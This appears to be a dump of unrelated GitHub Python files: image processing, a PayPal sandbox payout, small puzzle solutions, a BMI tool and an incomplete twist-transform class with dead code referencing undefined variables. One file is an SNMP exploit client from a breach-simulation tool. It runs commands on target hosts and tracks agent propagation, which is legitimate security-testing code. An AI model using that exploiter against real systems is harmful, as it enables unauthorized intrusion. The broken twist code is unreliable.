print(\"Falha no Parsing!\", repr(message))\r\n\r\n if m.MSH.MSH_9.MSH_9_3.to_er7() == 'QBP_Q11':\r\n response = responder(m)\r\n else:\r\n print (\"Mensagem recebida irregularmente!\")\r\n response = \"none\"\r\n\r\n self.wfile.write(response)\r\n line = ''\r\n\r\nif __name__ == \"__main__\":\r\n HOST, PORT = \"localhost\", 6000\r\n\r\n server = TCPServer((HOST, PORT), MLLPServer)\r\n server.serve_forever()\r\n","repo_name":"rcaporal/hl7_python","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9063366198","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom skimage.color import rgb2gray\nfrom skimage.morphology import disk\nfrom skimage.filters import rank\nfrom skimage.transform import ProjectiveTransform, warp\nfrom skimage.filters import gabor_kernel\nfrom scipy.signal import fftconvolve\nfrom skimage.filters import threshold_otsu\nfrom skimage import measure\nfrom skimage.transform import hough_line, hough_line_peaks\nfrom skimage.morphology import skeletonize\nfrom skimage.exposure import adjust_log\nfrom skimage.util import img_as_ubyte\nfrom skimage.transform import resize\nimport os\n\n\nMAX_SIDE_LENGTH = 1024\n \n\ndef resize_im(im, max_side):\n \"\"\"Resize an image so the its longer side is the specified length\"\"\"\n ratio = float(max_side) / max(im.shape[:2])\n new_h = int(round(ratio*im.shape[0]))\n new_w = int(round(ratio*im.shape[1]))\n return resize(im, (new_h, new_w))\n\n\ndef dist_angle_to_slope_interept(line):\n \"\"\"Convert between line representations\"\"\"\n angle, dist = line\n slope = np.tan(angle - np.pi/2)\n y_intercept = dist / np.sin(angle)\n return slope, y_intercept\n\n\ndef line_intersection(line1, line2):\n \"\"\"\n Compute the point of intersection between two lines \n (in dist-angle representation)\n \"\"\"\n if line1[0] == 0:\n print('line 1 vertical')\n if line2[0] == 0:\n a, c = dist_angle_to_slope_interept(line1)\n print('line 2 vertical')\n print(line1, a, c)\n a, c = dist_angle_to_slope_interept(line1)\n b, d = dist_angle_to_slope_interept(line2)\n if a == b: # lines are parallel or coincident\n return None\n x = (d - c) / (a - b)\n y = (a*d - b*c) / (a - b)\n return x, y\n\n\ndef line_invrot90(line, im_shape):\n \"\"\"\n Rotate a line in dist-angle representation in the same sense as np.rot90\n \"\"\"\n theta1, d1 = line\n theta2 = np.pi/2 - theta1\n if abs(theta2) == 0 :\n return 0, im_shape[0] - d1\n x1, y1 = d1 * np.cos(theta1), d1 * np.sin(theta1)\n h1 = d1 / np.cos(theta2)\n h2 = im_shape[0] - h1\n d2 = h2 * np.cos(theta2)\n return -theta2, d2\n\n\ndef edge_response(im, sigma, thetas=np.linspace(-np.pi/10, np.pi/10, 5)):\n \"\"\"Compute the edge response max-pooled over a range of orientations\"\"\"\n kernels = []\n for theta in thetas:\n kern = gabor_kernel(.1/sigma, theta=theta, sigma_x=sigma, sigma_y=2*sigma, n_stds=2).imag\n kern = np.rot90(kern, 3)\n kernels.append(np.fliplr(np.flipud(kern)))\n\n # kernel responses, max pooled over orientations\n resp_im = np.zeros_like(im)\n for kern in kernels:\n resp = fftconvolve(im, kern, mode='same')\n resp_im = np.maximum(resp, resp_im)\n return resp_im\n\n\ndef brightest_object_mask(gray):\n \"\"\"\n Threshold a grayscale response image and return a mask of the brightest object\n \"\"\"\n edges = gray > threshold_otsu(gray)\n\n # create a mask containing the object with the strongest response\n label_im = measure.label(edges)\n regions = measure.regionprops(label_im)\n if len(regions) == 0:\n raise ValueError('mask must have at least one object')\n max_resp = 0\n for region in regions:\n lbl = region.label\n mask = label_im == lbl\n region_resp = gray[mask].sum()\n if region_resp > max_resp:\n max_resp = region_resp\n max_region = region\n largest_object_mask = label_im == max_region.label\n return largest_object_mask\n\n\ndef best_horizontal_line(im, theta_range=np.pi/10, n_theta=5):\n \"\"\"Find the dominant horizontal (dark-above-bright) line in an image\"\"\"\n \n # Compute horizontal edges, get biggest outline\n resp_im = edge_response(im, sigma=5, thetas=np.linspace(-theta_range, theta_range, n_theta))\n outline_mask = brightest_object_mask(resp_im)\n \n # FIXME: if outline map overlaps the top of im, this means that the receipt\n # is not centered correctly (receipt edge outside frame)\n \n # Hough transform\n h, theta, d = hough_line(skeletonize(outline_mask), theta=np.linspace(-np.pi/2, np.pi/2, 180))\n _, angles, dists = hough_line_peaks(h, theta, d, threshold=0.1 * h.max(), num_peaks=10)\n \n # Compute gradient strength along each Hough line\n line_strength_dict = {}\n for angle, dist in zip(angles, dists):\n y0 = (dist - 0 * np.cos(angle)) / np.sin(angle)\n y1 = (dist - outline_mask.shape[1] * np.cos(angle)) / np.sin(angle)\n y0 = min([y0, outline_mask.shape[0]])\n y1 = min([y1, outline_mask.shape[0]])\n pt1 = (y0, 0)\n pt2 = (y1, outline_mask.shape[1])\n line_profile = measure.profile_line(resp_im, pt1, pt2)\n line_strength_dict[(angle, dist)] = line_profile.mean()\n\n horizontal_lines = [line for line in line_strength_dict if np.pi/2 - abs(line[0]) < theta_range]\n try:\n best_line = max(horizontal_lines, key=lambda x: line_strength_dict[x])\n except ValueError:\n return None\n return best_line\n\n\ndef get_receipt_edges(gray):\n \"\"\"The (straight-line) edges of a centered 4-sided white object\"\"\"\n\n # TODO: disk/selem size should be fraction of input size\n median = rank.median(gray, disk(11))\n \n # Divide into halves\n top_im = median[:int(median.shape[0]/2), :]\n bottom_im = median[int(median.shape[0]/2):, :]\n left_im = median[:, :int(median.shape[1]/2)]\n right_im = median[:, int(median.shape[1]/2):]\n\n # Rotate so center is down, detect best horizontal line\n top_line = best_horizontal_line(top_im)\n left_line = best_horizontal_line(np.rot90(left_im,3))\n right_line = best_horizontal_line(np.rot90(right_im))\n bottom_line = best_horizontal_line(np.rot90(bottom_im,2))\n \n # Rotate back to original orientation\n right_line = line_invrot90(right_line, np.rot90(right_im).shape)\n bottom_line = line_invrot90(line_invrot90(bottom_line, np.rot90(bottom_im,2).shape), np.rot90(bottom_im).shape)\n left_line = line_invrot90(line_invrot90(line_invrot90(left_line, np.rot90(left_im).shape), np.rot90(left_im,2).shape), np.rot90(left_im,3).shape)\n\n # Correct for offset/cropping\n right_line = right_line[0], right_line[1] + np.cos(right_line[0])*gray.shape[1]/2\n bottom_line = bottom_line[0], + bottom_line[1] + np.sin(bottom_line[0]) * gray.shape[0]/2\n \n return top_line, right_line, bottom_line, left_line\n\n\ndef preprocess_image(im):\n\n im = resize_im(im, MAX_SIDE_LENGTH)\n gray = rgb2gray(im)\n\n # Get the edges of the receipt\n top_line, right_line, bottom_line, left_line = get_receipt_edges(gray)\n\n # Intersect to get corners\n TR = line_intersection(top_line, right_line)\n TL = line_intersection(top_line, left_line)\n BR = line_intersection(bottom_line, right_line)\n BL = line_intersection(bottom_line, left_line)\n\n # Warp so receipt corners are image corners\n transform = ProjectiveTransform()\n height = max([BL[1] - TL[1], BR[1] - TR[1]])\n width = max([TR[0] - TL[0], BR[1] - BL[1]])\n src_pts = np.array([TL, TR, BL, BR])\n dest_pts = np.array([[0, 0], \n [width, 0],\n [0, height],\n [width, height]\n ])\n success = transform.estimate(src_pts, dest_pts)\n warped_im = warp(gray, transform.inverse)[:int(height), :int(width)]\n\n warped_gray = rgb2gray(warped_im)\n enhanced_gray = img_as_ubyte(adjust_log(warped_gray))\n\n return enhanced_gray\n\n\n\nif __name__=='__main__':\n\n in_fn = '../data/receipt.jpg'\n\n im = plt.imread(in_fn)\n print(im.shape)\n enhanced_gray = preprocess_image(im)\n \n\n fname, ext = os.path.splitext(in_fn)\n out_fn = fname + '_preprocessed' + ext\n print(out_fn)\n plt.imsave(out_fn, enhanced_gray)\n","repo_name":"brikeats/receipt-reader","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"2161211040","text":"import requests\nfrom requests.auth import HTTPBasicAuth\nimport json\nimport uuid\n\n\ndef process_payment(merchant_email, amount, details):\n details_dict = {\n 'email': details[0][0],\n 'clientId': details[0][1],\n 'secret': details[0][2],\n 'ref': details[0][3]\n }\n # Generate unique UUID's for sender_batch_id\n batch_id = uuid.uuid4()\n # Parameters for making API requests\n url = \"https://api.sandbox.paypal.com/v1/oauth2/token\"\n payload = 'grant_type=client_credentials'\n headers = {'Accept': 'application/json'}\n\n auth_header = {'Username': details_dict['clientId'],\n 'Password': details_dict['secret']}\n # POST request to get access token\n response = requests.post(url, headers=headers, data=payload, auth=HTTPBasicAuth(\n auth_header['Username'], auth_header['Password']))\n\n access_token = response.json()['access_token']\n print(f'ACCESS TOKEN {access_token}')\n\n # Use the access token from response to create a batch payout\n url = \"https://api.sandbox.paypal.com/v1/payments/payouts\"\n\n payload = {\n \"sender_batch_header\": {\n \"sender_batch_id\": \"Payouts_2020_\"+str(batch_id),\n \"email_subject\": \"You have a payout!\",\n \"email_message\": \"You have received a payout! Thanks for using our service!\"\n },\n \"items\": [\n {\n \"recipient_type\": \"EMAIL\",\n \"amount\": {\n \"value\": amount,\n \"currency\": \"USD\"\n },\n \"note\": \"Thanks for your patronage!\",\n \"sender_item_id\": \"201403140001\",\n \"receiver\": merchant_email,\n \"alternate_notification_method\": {\n \"phone\": {\n \"country_code\": \"91\",\n \"national_number\": \"9999988888\"\n }\n }\n }\n ]\n }\n\n payload_json = json.dumps(payload)\n\n headers = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer ' + access_token\n }\n # POST request to make a payout\n\n response = requests.post(url, headers=headers, data=payload_json)\n\n print(f'PAYOUT {response.json()}')\n print(response.status_code)\n return response.status_code\n","repo_name":"MeetJainAi/PAYMENT-USING-FACIAL-RECOGNITION","sub_path":"payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22072870715","text":"# Implement function ToLowerCase() that has a string parameter str, and returns the same string in lowercase.\n#\n#\n#\n# Example 1:\n#\n# Input: \"Hello\"\n# Output: \"hello\"\n# Example 2:\n#\n# Input: \"here\"\n# Output: \"here\"\n# Example 3:\n#\n# Input: \"LOVELY\"\n# Output: \"lovely\"\n\n\n\n# Logic\n# Check is the current char is between \"A\" and \"Z\" (using ord)\n # If yes convert it lower char using ord and chr inbuilt methods\n # If not append the char directly to the new string\n# Return lower case string\n\n\n\nclass Solution:\n def toLowerCase(self, str: str) -> str:\n lower_case_string = \"\"\n MIN_ORD = ord(\"A\")\n MAX_ORD = ord(\"Z\")\n\n for s in str:\n curr_char_ord = ord(s)\n if MIN_ORD <= curr_char_ord <= MAX_ORD:\n lower_case_converted_char = curr_char_ord + 32\n lower_case_string += chr(lower_case_converted_char)\n else:\n lower_case_string += s\n\n return lower_case_string","repo_name":"ambarish710/python_concepts","sub_path":"leetcode/easy/709_To_Lower_Case.py","file_name":"709_To_Lower_Case.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40542012592","text":"from functools import partial, wraps\nfrom ipaddress import IPv4Address\nfrom logging import getLogger\nfrom time import time\nfrom typing import Callable, Tuple, Type\n\nfrom monkeytypes import Event\n\nfrom common.agent_events import ExploitationEvent, PropagationEvent\nfrom common.event_queue import IAgentEventPublisher\nfrom common.tags.attack import (\n EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,\n EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,\n INGRESS_TOOL_TRANSFER_T1105_TAG,\n)\nfrom common.types import AgentID\nfrom common.utils.code_utils import insecure_generate_random_string\nfrom infection_monkey.i_puppet import TargetHost\n\nfrom .snmp_client import SNMPClient\nfrom .snmp_options import SNMPOptions\n\nCOMMAND_NAME_LENGTH = 6\n\nlogger = getLogger(__name__)\n\n\nSNMP_EXPLOITER_TAG = \"snmp-exploiter\"\nEXPLOITATION_TAGS = (\n SNMP_EXPLOITER_TAG,\n EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,\n EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,\n)\nPROPAGATION_TAGS = (SNMP_EXPLOITER_TAG, INGRESS_TOOL_TRANSFER_T1105_TAG)\n\n\ndef repeat_on_error(max_times: int = 3, error_types: Tuple[Type] = (Exception,)):\n \"\"\"\n Decorator to repeat a command if it fails with an error\n\n :param times: The maximum number of times to repeat the command\n :param error_types: The types of errors to catch\n \"\"\"\n\n def decorator(func):\n @wraps(func)\n def inner(*args, **kwargs):\n for _ in range(max_times - 1):\n try:\n return func(*args, **kwargs)\n except error_types as err:\n logger.debug(f\"Retrying due to error: {err}\")\n\n # Allow the exception on the last try to bubble up\n return func(*args, **kwargs)\n\n return inner\n\n return decorator\n\n\nclass SNMPExploitClient:\n def __init__(\n self,\n agent_id: AgentID,\n agent_event_publisher: IAgentEventPublisher,\n exploiter_name: str,\n snmp_client: SNMPClient,\n generate_command_name: Callable[[], str] = partial(\n insecure_generate_random_string, COMMAND_NAME_LENGTH\n ),\n ):\n self._agent_id = agent_id\n self._agent_event_publisher = agent_event_publisher\n self._exploiter_name = exploiter_name\n self._snmp_client = snmp_client\n self._generate_command_name = generate_command_name\n\n def exploit_host(\n self,\n host: TargetHost,\n community_string: str,\n command: str,\n agent_binary_downloaded: Event,\n options: SNMPOptions,\n ) -> Tuple[bool, bool]:\n \"\"\"\n Exploit the host using SNMP using the provided community string\n\n :param host: The host to exploit\n :param community_string: The community string to use\n :param command: The command to execute\n :param agent_binary_downloaded: An event that will be set when the agent binary is\n downloaded\n :param options: The SNMP options\n :return: A tuple of two booleans: the first indicates whether the exploitation was\n successful, and the second indicates whether the propagation was successful\n \"\"\"\n exploitation_message = \"\"\n exploitation_success = True\n\n timestamp = time()\n try:\n self._exploit(host.ip, community_string, command)\n except Exception as err:\n logger.exception(f\"Attempt to exploit {host.ip} failed due to error: {err}\")\n exploitation_message = f\"{err}\"\n exploitation_success = False\n\n propagation_success = self._evaluate_propagation_success(\n exploitation_success, agent_binary_downloaded, options.agent_binary_download_timeout\n )\n\n self._publish_exploitation_event(\n host, timestamp, exploitation_success, exploitation_message\n )\n self._publish_propagation_event(host, timestamp, propagation_success)\n\n return exploitation_success, propagation_success\n\n def _exploit(self, target_ip: IPv4Address, community_string: str, command: str):\n command_name = self._create_command(target_ip, community_string, command)\n try:\n self._snmp_client.execute_command(target_ip, command_name, community_string)\n finally:\n self._snmp_client.clear_command(target_ip, command_name, community_string)\n\n @repeat_on_error(max_times=3)\n def _create_command(self, target_ip: IPv4Address, community_string: str, command: str) -> str:\n command_name = self._generate_command_name()\n logger.debug(f\"Creating SNMP command {command_name} on {target_ip}\")\n\n self._snmp_client.create_command(target_ip, command_name, community_string, command)\n\n return command_name\n\n def _publish_exploitation_event(\n self, host: TargetHost, timestamp: float, success: bool, message: str\n ):\n self._agent_event_publisher.publish(\n ExploitationEvent(\n source=self._agent_id,\n target=host.ip,\n timestamp=timestamp,\n tags=frozenset(EXPLOITATION_TAGS),\n success=success,\n exploiter_name=self._exploiter_name,\n error_message=message,\n )\n )\n\n def _publish_propagation_event(self, host: TargetHost, timestamp: float, success: bool):\n self._agent_event_publisher.publish(\n PropagationEvent(\n source=self._agent_id,\n target=host.ip,\n timestamp=timestamp,\n tags=frozenset(PROPAGATION_TAGS),\n success=success,\n exploiter_name=self._exploiter_name,\n )\n )\n\n @staticmethod\n def _evaluate_propagation_success(\n exploitation_success: bool,\n agent_binary_downloaded: Event,\n agent_binary_download_timeout: float,\n ) -> bool:\n if not exploitation_success:\n return False\n\n logger.debug(\"Waiting for the target to download the agent binary...\")\n agent_binary_downloaded.wait(agent_binary_download_timeout)\n\n return agent_binary_downloaded.is_set()\n","repo_name":"guardicore/monkey","sub_path":"monkey/agent_plugins/exploiters/snmp/src/snmp_exploit_client.py","file_name":"snmp_exploit_client.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":6367,"dataset":"github-code","pt":"21"} +{"seq_id":"374437635","text":"#!/usr/bin/env python3\n\"\"\"\n# Day 4: Repose Record\n\nhttps://adventofcode.com/2018/day/4\n\n## Challenges\nCovering the walls, someone has spent an hour starting every midnight for the\npast few months secretly observing this guard post! They've been writing down\nthe ID of the one guard on duty that night.\n\n* A: Find the guard that has the most minutes asleep. What minute does that\n guard spend asleep the most?\n* B: Of all guards, which guard is most frequently asleep on the same minute?\n\"\"\"\n\nfrom collections import Counter\nfrom datetime import datetime\nimport re\n\n\ndef main():\n \"\"\"Main\"\"\"\n lines = get_challenge()\n guards = parse_guard_shifts(lines)\n print(\"A: {}\".format(solve_a(guards)))\n print(\"B: {}\".format(solve_b(guards)))\n\n\ndef get_challenge():\n \"\"\"Read lines from the challenge input file\"\"\"\n lines = list()\n with open(\"./input.txt\", 'r') as hdl:\n for line in hdl.readlines():\n lines.append(line.strip())\n return lines\n\n\ndef parse_guard_shifts(log_lines):\n \"\"\"\n Parse a line of input\n\n Example shift entry:\n [1518-11-02 23:56] Guard #3463 begins shift\n \"\"\"\n\n log_entries = dict()\n\n # parse date from log entries\n for log_line in log_lines:\n matches = re.search(r'^\\[([^]]+)\\] (.*)', log_line)\n timestamp = datetime.strptime(matches.group(1), \"%Y-%m-%d %H:%M\")\n log_entries[timestamp] = matches.group(2)\n\n # parse the shifts\n shifts = list()\n shift_tmp = dict()\n nap_tmp = dict()\n for timestamp in sorted(log_entries.keys()): # sorted by date\n if 'begins shift' in log_entries[timestamp]:\n # start a new shift, save previous naps and shifts if present\n if nap_tmp:\n shift_tmp['naps'].append(nap_tmp)\n if shift_tmp:\n shifts.append(shift_tmp)\n matches = re.search(r'Guard #(\\d+)', log_entries[timestamp])\n nap_tmp = dict()\n shift_tmp = {\n 'id': matches.group(1),\n 'start': timestamp,\n 'end': 59,\n 'naps': list(),\n }\n elif 'falls asleep' in log_entries[timestamp]:\n nap_tmp = {\n 'start': timestamp,\n 'end': None,\n }\n elif 'wakes up' in log_entries[timestamp]:\n nap_tmp['end'] = timestamp\n shift_tmp['naps'].append(nap_tmp)\n # save previous naps and shifts if present\n if shift_tmp:\n shifts.append(shift_tmp)\n\n # transform shifts collection into collection of guards and their shifts\n guards = dict()\n for shift in shifts:\n # add guard entry if not present\n if shift['id'] not in guards:\n guards[shift['id']] = list()\n\n # create a minute element for the nap length\n # this makes it easy to count activity per minute in the solutions\n for nap in shift['naps']:\n # store which minutes they were sleeping\n min_count = nap['end'] - nap['start']\n for offset in range(int(min_count.seconds / 60)):\n guards[shift['id']].append(nap['start'].minute + offset)\n\n return guards\n\n\ndef solve_a(guards):\n # sort guards by minutes slept\n sorted_keys = sorted(guards.keys(), key=lambda guard: len(guards[guard]))\n sleepiest_guard = sorted_keys[-1]\n\n # find the most common minute slept\n minutes = Counter(guards[sleepiest_guard])\n sleepiest_minute = minutes.most_common(1)[0][0]\n\n return int(sleepiest_guard) * int(sleepiest_minute)\n\n\ndef solve_b(guards):\n sleepiest_log = list()\n for minute in range(0, 59):\n # go through the shifts and find who was asleep at this minute\n minute_log = (minute, None, None)\n for guard in guards:\n minutes_slept = guards[guard].count(minute)\n if not minute_log[1] or minutes_slept > minute_log[1]:\n minute_log = (minute, int(minutes_slept), int(guard))\n sleepiest_log.append(minute_log)\n\n solution = (None, None, None)\n for entry in sleepiest_log:\n if not solution[1] or entry[1] > solution[1]:\n solution = entry\n\n return solution[0] * solution[2]\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tobyoxborrow/adventofcode","sub_path":"2018/04-repose-record/guard_log.py","file_name":"guard_log.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21221636354","text":"class Transformable1(object):\n pass\n\n# does not work yet. Dont use.\n\nfrom implicit_vectorized import ImplicitFunctionVectorized\nimport numpy as np\nfrom basic_types import check_vector4_vectorized, make_vector4, check_vector4, check_scalar_vectorized, make_inverse\n\n#ImplicitFuncitonVectorized3\nclass TwistZ(ImplicitFunctionVectorized, Transformable1):\n \"\"\" Twists alont the Z axis only, around Z axis.\n To change this, apply a matrix and its reverse (a separate class)\n Also see class @Transformed and @Screw.\"\"\"\n\n\n def __init__(self, base_object, twist_rate):\n \"\"\"twist_rate: # cycles per mm\n \"\"\"\n # axis_x0 is z always for now\n\n self.lamda = np.pi*2*twist_rate\n #if is_python3():\n # super().__init__(initialMatrix=m)\n #else:\n # super(Transformed, self).__init__(initialMatrix=m)\n\n assert issubclass(type(base_object), ImplicitFunctionVectorized)\n self.base_object = base_object\n\n #if m is None:\n # m = np.eye(4)\n #check_matrix4(m)\n #self.matrix = m.copy()\n #self.invmatrix = make_inverse(m)\n\n #m = np.eye(4)\n #self.invmatrix = make_inverse(m)\n\n assert isinstance(self.base_object, ImplicitFunctionVectorized)\n\n def integrity_invariant(self):\n return True\n\n def implicitFunction(self, p):\n check_vector4_vectorized(p)\n # vec3.check_vector3_vectorized(p)\n N = p.shape[0]\n print(\"self.lamda\", self.lamda)\n theta = p[:, 2] * self.lamda\n print(theta.shape)\n assert theta.shape == (N,)\n ca = np.cos(theta)\n sa = np.sin(theta)\n print(theta.shape, \"theta\")\n print(theta)\n\n #aa = ca[:, np.newaxis]\n #bb = p[:, 0, np.newaxis]\n #cc = - sa[:, np.newaxis]\n #dd = p[:, 1, np.newaxis]\n #print aa.shape, \"aa\"\n #print bb.shape, \"bb\"\n #print cc.shape, \"cc\"\n #print dd.shape, \"dd\"\n\n\n #x1 = ca[:, np.newaxis]*p[:, 0] - sa[:, np.newaxis]*p[:, 1]\n #x1 = aa*bb # +cc*dd\n\n p2 = np.concatenate((\n ca[:, np.newaxis]*p[:, 0, np.newaxis] - sa[:, np.newaxis]*p[:, 1, np.newaxis],\n sa[:, np.newaxis]*p[:, 0, np.newaxis] + ca[:, np.newaxis]*p[:, 1, np.newaxis],\n p[:, 2, np.newaxis], # z\n p[:, 3, np.newaxis] # 1.\n ), axis=1)\n\n v = self.base_object.implicitFunction(p2)\n check_scalar_vectorized(v)\n return v\n\n #cs = np.concatenate((ca[:, np.newaxis], sa[:, np.newaxis]), axis=1)\n #assert cs.shape == (N, 2)\n # Nx2x2\n #cs_4 = np.concatenate( (\n # ca[:, np.newaxis],\n # -sa[:, np.newaxis],\n # sa[:, np.newaxis],\n # ca[:, np.newaxis]\n # ), axis=1)\n assert cs_4.shape == (N, 4)\n cs_2x2 = cs_4.reshape(N, 2, 2) #contains the reverse rotation matrix\n assert cs_2x2.shape == (N, 2, 2)\n #xy = np.dot(cs_2x2, p[:, 0:2])\n #assert xy.shape == (N, 2)\n p2 = p.copy()\n #p2[:, 0:2] = np.dot(cs_2x2, p[:,0:2])\n #m = np.tensordot(cs_2x2, p[:, 0:2], axes=(2, 1))\n\n #np.sum(a*b, axis=1)\n\n print(\"m.shape\", m.shape)\n p2[:, 0:2] = m\n\n v = self.base_object.implicitFunction(p2)\n check_scalar_vectorized(v)\n return v\n\n #def implicitGradient(self, p): # -> Vector3D :\n #check_vector4_vectorized(p)\n #tp = np.dot(self.invmatrix, vec3.make_v4(np.transpose(p)))\n #tp = np.transpose(tp)\n #g = self.base_object.implicitGradient(tp)\n #check_vector4_vectorized(g)\n # #g[:, 3] = 0 # important\n #v4 = np.dot(np.transpose(self.invmatrix), vec3.make_v4(np.transpose(g)))\n #v4 = np.transpose(v4) # not efficient\n # #v4[:, 3] = 1\n #check_vector4_vectorized(v4)\n #return v4\n\n def implicitGradient__(self, p): # -> Vector3D :\n check_vector4_vectorized(p)\n p = np.concatenate((p, np.ones((p.shape[0], 1))), axis=1)\n tp = np.dot(self.invmatrix, np.transpose(p))\n tp = np.transpose(tp)\n #tp = tp[:, :3]\n g = self.base_object.implicitGradient(tp)\n\n check_vector4_vectorized(g)\n\n g = np.concatenate((g, np.ones((g.shape[0], 1))), axis=1)\n v4 = np.dot(np.transpose(self.invmatrix), (np.transpose(g)))\n v4 = np.transpose(v4)\n #v3 = v4[:, :3]\n\n check_vector4_vectorized(v4)\n return v4\n\n def hessianMatrix(self, p):\n #warning: not tested\n check_vector4_vectorized(p)\n #tp = np.dot(self.invmatrix, vec3.make_v4(np.transpose(p)))\n #tp = np.transpose(tp)\n\n h1 = self.base_object.hessianMatrix(tp)\n #h = np.dot(h1, self.invmatrix) # which one is correct?\n #h = np.dot(self.invmatrix, vec3.make_v4(np.tanspose(h1))) # which one is correct?\n raise NotImplementedException()\n return h\n\n\n__all__ = ['Ellipsoid', 'Transformed']\n","repo_name":"sohale/implisolid","sub_path":"python_implicit/twist_z.py","file_name":"twist_z.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"17606028792","text":"from warnings import warn\nfrom typing import Tuple\nimport pandas as pd\nfrom bmi_calculator.settings import JSON_INPUT_PATH, JSON_OUTPUT_PATH, BMI_RANGES, BMI_HEALTH_RISK\n\n\ndef calculate_bmi(weight: int, height: int) -> float:\n \"\"\"\n calculate BMI given weight in kgs and height in cms\n :param weight: weight in kgs\n :param height: height in cms\n :return: BMI\n \"\"\"\n if weight <= 0:\n warn(\"Weight can not take negative values.\")\n return None\n elif height <= 0:\n warn(\"Height can not take negative values.\")\n return None\n else:\n return round(float(weight) * 10000 / height ** 2, 1)\n\n\ndef get_bmi_range(bmi: float) -> str:\n \"\"\"\n get the BMI range associated to the BMI value using the settings dict giving the match\n :param bmi: BMI value\n :return: BMI range\n \"\"\"\n for bmi_range in BMI_RANGES:\n if bmi <= bmi_range[\"BMI upper limit\"]:\n return bmi_range[\"BMI Category\"]\n return None\n\n\ndef add_bmi_range(data_pd: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n add in giving pandas dataframe with \"bmi\" column containing BMI values, a column with the BMI range and a column\n with the associated health risk\n :param data_pd: input dataframe with \"bmi\" column\n :return: output dataframe with 'BMICategory' and 'BMICategory' columns added\n \"\"\"\n result_pd = data_pd.copy()\n result_pd[\"bmi\"] = result_pd.apply(lambda r: calculate_bmi(r.WeightKg, r.HeightCm), axis=1)\n result_pd[\"BMICategory\"] = result_pd[\"bmi\"].map(get_bmi_range)\n result_pd[\"HealthRisk\"] = result_pd[\"BMICategory\"].map(BMI_HEALTH_RISK)\n return result_pd\n\n\ndef main():\n \"\"\"\n read patients data from a json file\n add \"bmi\", 'BMICategory' and 'BMICategory' columns\n display the number of overweight people\n write resulting table in a json file\n \"\"\"\n data_pd = pd.read_json(JSON_INPUT_PATH)\n data_pd = add_bmi_range(data_pd)\n print(f\"Number of overweight people : {(data_pd['BMICategory'] == 'Overweight').sum()}\")\n data_pd.to_json(JSON_OUTPUT_PATH, orient='records')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yasshass/code-20211128-mohamedyassinehassairi","sub_path":"bmi_calculator/calculate_bmi.py","file_name":"calculate_bmi.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33977108434","text":"\n\nSEXO_CHOICE = (\n ('M','Masculino'),\n ('F','Femenino'),\n )\nTIPO_DOC = (\n ('DNI','DNI'),\n ('CI','Cedula de Identidad'),\n ('LE','Libreta de Enrolamiento'),\n ('LC','Libreta Civica'),\n )\n\"\"\"\nDIA_CHOICES = (\n ('LUN', 'Lunes'),\n ('MAR','Martes'),\n ('MIE','Miercoles'),\n ('JUE','Jueves'),\n ('VIE','Viernes'),\n ('SAB','Sabado'),\n \n )\n\"\"\"\nDIA_CHOICES = (\n (0, 'Lunes'),\n (1,'Martes'),\n (2,'Miercoles'),\n (3,'Jueves'),\n (4,'Viernes'),\n (5,'Sabado'),\n \n )\n\nESTADO_CIVIL_CHOICE = (\n ('-', 'No Definido'),\n ('S', 'Soltero'),\n ('C', 'Casado'),\n ('V', 'Viudo'),\n ('D', 'Divorciado'),\n)\n\n\nGRUPO_SANGUINEO_CHOICE = (\n (\"O+\", \"O+\"),\n (\"O-\",\"O-\"),\n (\"A+\",\"A+\"),\n (\"A-\",\"A-\"),\n (\"B+\",\"B+\"),\n (\"B-\",\"B-\"),\n (\"AB+\",\"AB+\"),\n (\"AB-\",\"AB-\"),\n)\n\n\nTIPOS_PRACTICAS_CHOICES =( (\"ANC\",\"Analisis Clinicos\"),\n (\"QUI\",\"Quirurgicas\"),\n (\"ODO\",\"Odontologicas\"),\n (\"ESP\",\"Especializadas\"),\n )\n\nTIPOS_ESTADOS_PRACTICAS =( (\"Pendiente\",\"Pendiente\"),\n (\"Realizado\",\"Realizado\"),\n (\"Finalizado\",\"Finalizado\"),\n (\"Anulado\",\"Anulado\"),\n \n )\n\n\nTIPOS_ESTADOS_RECETA = ( (\"Activo\",\"Activo\"),\n (\"Anulado\",\"Anulado\"),\n \n \n )\nTIPOS_ESTADOS_TURNOS = ( (\"Presente\",\"Presente\"), \n (\"Ausente\",\"Ausente\"), \n )\n\nMESES =['01','02','03','04','05','06','07','08','09','10','11','12',]\n","repo_name":"P3NNYWISE/Seminario","sub_path":"Seminario/apps/tipos.py","file_name":"tipos.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74018278508","text":"print('='*30)\nprint('{:30}'.format('BANCO CEV'))\nprint('='*30)\nvalor = int(input('Que valor você quer sacar? R$'))\ntot = valor\ncéd = 50\ntotcéd = 0\nwhile True:\n if tot >= céd:\n tot -= céd\n tot += 1\n else:\n if totcéd > 0:\n print(f'Total de 